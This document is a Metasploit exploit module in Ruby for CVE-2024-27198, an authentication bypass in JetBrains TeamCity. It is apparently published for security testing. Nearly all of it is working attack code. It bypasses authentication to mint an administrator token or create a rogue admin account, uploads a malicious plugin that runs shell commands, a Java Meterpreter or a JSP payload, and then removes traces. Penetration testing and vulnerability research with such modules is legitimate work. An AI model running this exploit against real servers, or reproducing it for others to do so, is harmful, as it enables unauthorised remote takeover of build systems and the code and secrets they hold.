JetBrains TeamCity Unauthenticated Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'JetBrains TeamCity Unauthenticated Remote Code Execution',  
'Description' => %q{  
This module exploits an authentication bypass vulnerability in JetBrains TeamCity. An unauthenticated  
attacker can leverage this to access the REST API and create a new administrator access token. This token  
can be used to upload a plugin which contains a Metasploit payload, allowing the attacker to achieve  
unauthenticated RCE on the target TeamCity server. On older versions of TeamCity, access tokens do not exist  
so the exploit will instead create a new administrator account before uploading a plugin. Older version of  
TeamCity have a debug endpoint (/app/rest/debug/process) that allows for arbitrary commands to be executed,  
however recent version of TeamCity no longer ship this endpoint, hence why a plugin is leveraged for code  
execution instead, as this is supported on all versions tested.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'sfewer-r7', # Discovery, Analysis, Exploit  
],  
'References' => [  
['CVE', '2024-27198'],  
['URL', 'https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/'],  
['URL', 'https://blog.jetbrains.com/teamcity/2024/03/teamcity-2023-11-4-is-out/']  
],  
'DisclosureDate' => '2024-03-04',  
'Platform' => %w[java win linux unix],  
'Arch' => [ARCH_JAVA, ARCH_CMD],  
'Privileged' => false, # TeamCity may be installed to run as local system/root, or it may be run as a custom user account.  
# Tested against:  
# * TeamCity 2023.11.3 (build 147512) running on Windows Server 2022  
# * TeamCity 2023.11.2 (build 147486) running on Windows Server 2022  
# * TeamCity 2023.11.3 (build 147512) running on Linux  
# * TeamCity 2018.2.4 (build 61678) running on Windows Server 2016  
'Targets' => [  
[  
'Java', {  
'Platform' => 'java',  
'Arch' => ARCH_JAVA,  
'DefaultOptions' => {  
# We execute the Java payload in a thread in the target Tomcat process. Spawn must be 0 for this to  
# happen, otherwise Spawn forces the Paylaod.java class to drop the payload to disk. For an unknown  
# reason Spawn > 0 will not work against TeamCity on Linux.  
'Spawn' => 0  
}  
}  
],  
[  
'Java Server Page', {  
'Platform' => %w[win linux unix],  
'Arch' => ARCH_JAVA  
}  
],  
[  
'Windows Command', {  
'Platform' => 'win',  
'Arch' => ARCH_CMD  
}  
],  
[  
'Linux Command', {  
'Platform' => 'linux',  
'Arch' => ARCH_CMD  
}  
],  
[  
'Unix Command', {  
'Platform' => 'unix',  
'Arch' => ARCH_CMD  
}  
]  
],  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
  
register_options(  
[  
# By default TeamCity listens for HTTP requests on TCP port 8111 (Older version of the product listen on  
# port 80 by default).  
Opt::RPORT(8111),  
OptString.new('TARGETURI', [true, 'The base path to TeamCity', '/']),  
# The first user created during installation is an administrator account, so the ID will be 1.  
OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1])  
]  
)  
end  
  
# This is the authentication bypass vulnerability, allowing any authenticated endpoint to be access unauthenticated.  
def send_auth_bypass_request_cgi(opts = {})  
# The file name of the .jsp can be 0 or more characters (it just has to end in .jsp)  
vars_get = {  
'jsp' => "#{opts['uri']};#{Rex::Text.rand_text_alphanumeric(rand(8))}.jsp"  
}  
  
# Add in 0 or more random query parameters, and ensure the order is shuffled in the request.  
0.upto(rand(8)) do  
vars_get[Rex::Text.rand_text_alphanumeric(rand(1..8))] = Rex::Text.rand_text_alphanumeric(rand(1..16))  
end  
  
opts['vars_get'] ||= {}  
  
opts['vars_get'].merge!(vars_get)  
  
opts['shuffle_get_params'] = true  
  
opts['uri'] = normalize_uri(target_uri.path, Rex::Text.rand_text_alphanumeric(8))  
  
send_request_cgi(opts)  
end  
  
def check  
# We leverage the vulnerability to reach the /app/rest/server endpoint. If this request succeeds then we know the  
# target is vulnerable.  
server_res = send_auth_bypass_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'server')  
)  
  
return CheckCode::Unknown('Connection failed') unless server_res  
  
# A patched TeamCity, e.g. 2023.11.4, reports 403 (Forbidden)  
return CheckCode::Safe if server_res.code == 403  
  
return CheckCode::Unknown("Received unexpected HTTP status code: #{server_res.code}.") unless server_res.code == 200  
  
# We can request /app/rest/debug/jvm/systemProperties and pull out the Java "os.name" property. We dont fail the  
# check routine if this request fails, as we have enough info to provide a CheckCode, however displaying the target  
# platform can help inform the user what payload target to choose (i.e. Windows or Linux).  
sysprop_res = send_auth_bypass_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'debug', 'jvm', 'systemProperties')  
)  
  
platform = ''  
  
if sysprop_res&.code == 200  
xml_sysprop_data = sysprop_res.get_xml_document  
  
os_name = xml_sysprop_data&.at('property[name="os.name"]')  
  
platform = " running on #{os_name.attr('value')}" if os_name  
end  
  
xml_server_data = server_res.get_xml_document  
  
server_data = xml_server_data&.at('server')  
  
version = " #{server_data.attr('version')}" if server_data  
  
CheckCode::Vulnerable("JetBrains TeamCity#{version}#{platform}.")  
end  
  
def exploit  
#  
# 1. Leverage the auth bypass to generate a new administrator access token. Older version of TeamCity (circa 2018)  
# do not have support for access token, so we fall back to creating a new administrator account. The benefit  
# of using an access token is we can delete it when we are finished, unlike a user account.  
#  
token_name = Rex::Text.rand_text_alphanumeric(8)  
  
res = send_auth_bypass_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'users', "id:#{datastore['TEAMCITY_ADMIN_ID']}", 'tokens', token_name)  
)  
  
if res && (res.code == 404) && res.body.include?('api.NotFoundException')  
  
print_warning('Tokens API not found, falling back to creating an admin user.')  
  
token_name = nil  
token_value = nil  
  
http_authorization = auth_new_admin_user  
  
fail_with(Failure::NoAccess, 'Failed to login with new admin user credentials.') if http_authorization.nil?  
else  
unless res&.code == 200  
# One reason token creation may fail is if we use a user ID for a user that does not exist. We detect that here  
# and instruct the user to choose a new ID via the TEAMCITY_ADMIN_ID option.  
if res && (res.code == 404) && res.body.include?('User not found')  
print_warning('User not found. Try setting the TEAMCITY_ADMIN_ID option to a different ID.')  
end  
  
fail_with(Failure::UnexpectedReply, 'Failed to create an authentication token.')  
end  
  
# Extract the authentication token from the response.  
token_value = res.get_xml_document&.xpath('/token')&.attr('value')&.to_s  
  
fail_with(Failure::UnexpectedReply, 'Failed to read authentication token from reply.') if token_value.nil?  
  
print_status("Created authentication token: #{token_value}")  
  
http_authorization = "Bearer #{token_value}"  
end  
  
# As we have created an access token, this begin block ensures we delete the token when we are done.  
begin  
#  
# 2. Create a malicious TeamCity plugin to host our payload.  
#  
plugin_name = Rex::Text.rand_text_alphanumeric(8)  
  
zip_plugin = create_payload_plugin(plugin_name)  
  
fail_with(Failure::BadConfig, 'Could not create the payload plugin.') if zip_plugin.nil?  
  
#  
# 3. Upload the payload plugin to the TeamCity server  
#  
print_status("Uploading plugin: #{plugin_name}")  
  
message = Rex::MIME::Message.new  
  
message.add_part(  
"#{plugin_name}.zip",  
nil,  
nil,  
'form-data; name="fileName"'  
)  
  
message.add_part(  
zip_plugin.pack.to_s,  
'application/octet-stream',  
'binary',  
"form-data; name=\"file:fileToUpload\"; filename=\"#{plugin_name}.zip\""  
)  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'admin', 'pluginUpload.html'),  
'ctype' => 'multipart/form-data; boundary=' + message.bound,  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => http_authorization  
},  
'data' => message.to_s  
)  
  
fail_with(Failure::UnexpectedReply, 'Failed to upload the plugin.') unless res&.code == 200  
  
#  
# 4. We have to enable the newly uploaded plugin so the plugin actually loads into the server.  
#  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'admin', 'plugins.html'),  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => http_authorization  
},  
'vars_post' => {  
'action' => 'loadAll',  
'plugins' => plugin_name  
}  
)  
  
fail_with(Failure::UnexpectedReply, 'Failed to load the plugin.') unless res&.code == 200  
  
# As we have uploaded the plugin, this begin block ensure we delete the plugin when we are done.  
begin  
#  
# 5. Begin to clean up, register several paths for cleanup.  
#  
if (install_path, sep = get_install_path(http_authorization))  
vprint_status("Target install path: #{install_path}")  
  
if target['Arch'] == ARCH_JAVA  
# The Java payload plugin will have its buildServerResources extracted to a path like:  
# C:\TeamCity\webapps\ROOT\plugins\yxfyjrBQ  
# So we register this for cleanup.  
# Note: The java process may recreate this a second time after we delete it.  
register_dir_for_cleanup([install_path, 'webapps', 'ROOT', 'plugins', plugin_name].join(sep))  
end  
  
if (build_number = get_build_number(http_authorization))  
vprint_status("Target build number: #{build_number}")  
  
# The Tomcat web server will compile our ARCH_JAVA payload and store the associated .class files in a  
# path like: C:\TeamCity\work\Catalina\localhost\ROOT\TC_147512_6vDwPWJs\org\apache\jsp\plugins\_6vDwPWJs\  
# So we register this for cleanup too. This folder will be created for a ARCH_CMD payload, although  
# it will be empty.  
register_dir_for_cleanup([install_path, 'work', 'Catalina', 'localhost', 'ROOT', "TC_#{build_number}_#{plugin_name}"].join(sep))  
else  
print_warning('Could not discover build number. Unable to register Catalina files for cleanup.')  
end  
else  
print_warning('Could not discover install path. Unable to register files for cleanup.')  
end  
  
# On a Linux target we see the extracted plugin file remaining here even after we delete the plugin.  
# /home/teamcity/.BuildServer/system/caches/plugins.unpacked/XXXXXXXX/  
if (data_path = get_data_dir_path(http_authorization))  
vprint_status("Target data directory path: #{data_path}")  
  
register_dir_for_cleanup([data_path, 'system', 'caches', 'plugins.unpacked', plugin_name].join(sep))  
else  
print_warning('Could not discover data directory path. Unable to register files for cleanup.')  
end  
  
#  
# 6. Trigger the payload and get a session. ARCH_JAVA JSP payloads need us to hit an endpoint. ARCH_JAVA Java  
# payloads and ARCH_CMD payloads are triggered upon enabling a loaded plugin.  
#  
if target['Arch'] == ARCH_JAVA && target['Platform'] != 'java'  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'plugins', plugin_name, "#{plugin_name}.jsp"),  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => http_authorization  
}  
)  
  
fail_with(Failure::UnexpectedReply, 'Failed to trigger the payload.') unless res&.code == 200  
end  
ensure  
#  
# 7. Ensure we delete the plugin from the server when we are finished.  
#  
print_status('Deleting the plugin...')  
  
print_warning('Failed to delete the plugin.') unless delete_plugin(http_authorization, plugin_name)  
end  
ensure  
#  
# 8. Ensure we delete the access token we created when we are finished. If we authorized via a user name and  
# password, we cannot delete the user account we created.  
#  
if token_name && token_value  
print_status('Deleting the authentication token...')  
  
print_warning('Failed to delete the authentication token.') unless delete_token(token_name, token_value)  
end  
end  
end  
  
def auth_new_admin_user  
admin_username = Faker::Internet.username  
admin_password = Rex::Text.rand_text_alphanumeric(16)  
  
res = send_auth_bypass_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'users'),  
'ctype' => 'application/json',  
'data' => {  
'username' => admin_username,  
'password' => admin_password,  
'name' => Faker::Name.name,  
'email' => Faker::Internet.email(name: admin_username),  
'roles' => {  
'role' => [  
{  
'roleId' => 'SYSTEM_ADMIN',  
'scope' => 'g'  
}  
]  
}  
}.to_json  
)  
  
unless res&.code == 200  
print_warning('Failed to create an administrator user.')  
return nil  
end  
  
print_status("Created account: #{admin_username}:#{admin_password} (Note: This account will not be deleted by the module)")  
  
http_authorization = basic_auth(admin_username, admin_password)  
  
# Login via HTTP basic authorization and store the session cookie.  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'admin', 'admin.html'),  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => http_authorization  
}  
)  
  
# A failed login attempt will return in a 401. We expect a 302 redirect upon success.  
if res&.code == 401  
print_warning('Failed to login with new admin user credentials.')  
return nil  
end  
  
http_authorization  
end  
  
def create_payload_plugin(plugin_name)  
if target['Arch'] == ARCH_CMD  
  
case target['Platform']  
when 'win'  
shell = 'cmd.exe'  
flag = '/c'  
when 'linux', 'unix'  
shell = '/bin/sh'  
flag = '-c'  
else  
print_warning('Unsupported target platform.')  
return nil  
end  
  
zip_resources = Rex::Zip::Archive.new  
  
zip_resources.add_file(  
"META-INF/build-server-plugin-#{plugin_name}.xml",  
<<~XML  
<?xml version="1.0" encoding="UTF-8"?>  
<beans xmlns="http://www.springframework.org/schema/beans"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd"  
default-autowire="constructor">  
<bean id="#{Rex::Text.rand_text_alpha(8)}" class="java.lang.ProcessBuilder" init-method="start">  
<constructor-arg>  
<list>  
<value>#{shell}</value>  
<value>#{flag}</value>  
<value><![CDATA[#{payload.encoded}]]></value>  
</list>  
</constructor-arg>  
</bean>  
</beans>  
XML  
)  
elsif target['Arch'] == ARCH_JAVA  
# If the platform is java we can bootstrap a Java Meterpreter  
if target['Platform'] == 'java'  
zip_resources = payload.encoded_jar(random: true)  
  
# Add in PayloadServlet as this is implements Runable and we can run the payload in a thread.  
servlet = MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class')  
zip_resources.add_file('/metasploit/PayloadServlet.class', servlet)  
  
payload_bean_id = Rex::Text.rand_text_alpha(8)  
  
# We start the payload in a new thread via some Spring Expression Language (SpEL).  
bootstrap_spel = "\#{ new java.lang.Thread(#{payload_bean_id}).start() }"  
  
# NOTE: We place bootstrap_spel in a separate bean, as if this generates an exception the plugin will fail  
# to load correctly, which prevents the exploit from deleting the plugin later. We choose java.beans.Encoder  
# as the setExceptionListener method will accept the null value the bootstrap_spel will generate. If we  
# choose a property that does not exist, we generate several exceptions in the teamcity-server.log.  
  
zip_resources.add_file(  
"META-INF/build-server-plugin-#{plugin_name}.xml",  
<<~XML  
<?xml version="1.0" encoding="UTF-8"?>  
<beans xmlns="http://www.springframework.org/schema/beans"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd">  
<bean id="#{payload_bean_id}" class="#{zip_resources.substitutions['metasploit']}.PayloadServlet"/>  
<bean class="java.beans.Encoder">  
<property name="exceptionListener" value="#{bootstrap_spel}"/>  
</bean>  
</beans>  
XML  
)  
else  
# For non java platforms with ARCH_JAVA, we can drop a JSP payload.  
zip_resources = Rex::Zip::Archive.new  
  
zip_resources.add_file("buildServerResources/#{plugin_name}.jsp", payload.encoded)  
end  
  
else  
print_warning('Unsupported target architecture.')  
return nil  
end  
  
zip_plugin = Rex::Zip::Archive.new  
  
zip_plugin.add_file(  
'teamcity-plugin.xml',  
<<~XML  
<?xml version="1.0" encoding="UTF-8"?>  
<teamcity-plugin xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="urn:schemas-jetbrains-com:teamcity-plugin-v1-xml">  
<info>  
<name>#{plugin_name}</name>  
<display-name>#{plugin_name}</display-name>  
<description>#{Faker::Lorem.sentence}</description>  
<version>#{Faker::App.semantic_version}</version>  
<vendor>  
<name>#{Faker::Company.name}</name>  
<url>#{Faker::Internet.url}</url>  
</vendor>  
</info>  
<deployment use-separate-classloader="true" node-responsibilities-aware="true"/>  
</teamcity-plugin>  
XML  
)  
  
zip_plugin.add_file("server/#{plugin_name}.jar", zip_resources.pack)  
  
zip_plugin  
end  
  
def get_install_path(http_authorization)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'server', 'plugins'),  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => http_authorization  
}  
)  
  
unless res&.code == 200  
print_warning('Failed to request plugins information.')  
return nil  
end  
  
plugins_xml = res.get_xml_document  
  
restapi_data = plugins_xml.at("//plugin[@name='rest-api']")  
  
restapi_load_path = restapi_data&.attr('loadPath')  
  
if restapi_load_path.nil?  
print_warning('Failed to extract plugin loadPath.')  
return nil  
end  
  
# C:\TeamCity\webapps\ROOT\WEB-INF\plugins\rest-api  
  
platforms = {  
'\\webapps\\ROOT\\WEB-INF\\plugins\\' => '\\',  
'/webapps/ROOT/WEB-INF/plugins/' => '/'  
}  
  
platforms.each do |path, sep|  
if (pos = restapi_load_path.index(path))  
return [restapi_load_path[0, pos], sep]  
end  
end  
  
print_warning('Failed to extract install path.')  
nil  
end  
  
def get_data_dir_path(http_authorization)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'server', 'dataDirectoryPath'),  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => http_authorization  
}  
)  
  
unless res&.code == 200  
print_warning('Failed to request data directory path.')  
return nil  
end  
  
res.body  
end  
  
def get_build_number(http_authorization)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'server'),  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => http_authorization  
}  
)  
  
unless res&.code == 200  
print_warning('Failed to request server information.')  
return nil  
end  
  
xml_data = res.get_xml_document  
  
server_data = xml_data.at('server')  
  
server_data.attr('buildNumber')  
end  
  
def get_plugin_uuid(http_authorization, plugin_name)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'admin', 'admin.html'),  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => http_authorization  
},  
'vars_get' => {  
'item' => 'plugins'  
}  
)  
  
unless res&.code == 200  
print_warning('Failed to list all plugins.')  
return nil  
end  
  
uuid_match = res.body.match(/'#{Regexp.quote(plugin_name)}', '([a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12})'/)  
  
if uuid_match&.length != 2  
print_warning('Failed to grep for plugin GUID')  
return nil  
end  
  
uuid_match[1]  
end  
  
def delete_plugin(http_authorization, plugin_name)  
plugin_uuid = get_plugin_uuid(http_authorization, plugin_name)  
  
if plugin_uuid.nil?  
print_warning('Failed to discover enabled plugin UUID')  
return false  
end  
  
vprint_status("Enabled Plugin UUID: #{plugin_uuid}")  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'admin', 'plugins.html'),  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => http_authorization  
},  
'vars_post' => {  
'action' => 'setEnabled',  
'enabled' => 'false',  
'uuid' => plugin_uuid  
}  
)  
  
unless res&.code == 200  
print_warning('Failed to disable the plugin.')  
return false  
end  
  
# The UUID changes after we disable the plugin, so we need to call get_plugin_uuid a second time.  
plugin_uuid = get_plugin_uuid(http_authorization, plugin_name)  
  
if plugin_uuid.nil?  
print_warning('Failed to discover disabled plugin UUID')  
return false  
end  
  
vprint_status("Disabled Plugin UUID: #{plugin_uuid}")  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'admin', 'plugins.html'),  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => http_authorization  
},  
'vars_post' => {  
'action' => 'delete',  
'uuid' => plugin_uuid  
}  
)  
  
unless res&.code == 200  
print_warning('Failed request for plugin deletion.')  
return false  
end  
  
true  
end  
  
def delete_token(token_name, token_value)  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'admin', 'accessTokens.html'),  
'keep_cookies' => true,  
'headers' => {  
'Origin' => full_uri,  
'Authorization' => "Bearer #{token_value}"  
},  
'vars_post' => {  
'accessTokenName' => token_name,  
'delete' => 'true',  
'userId' => datastore['TEAMCITY_ADMIN_ID']  
}  
)  
  
res&.code == 200  
end  
  
end  
`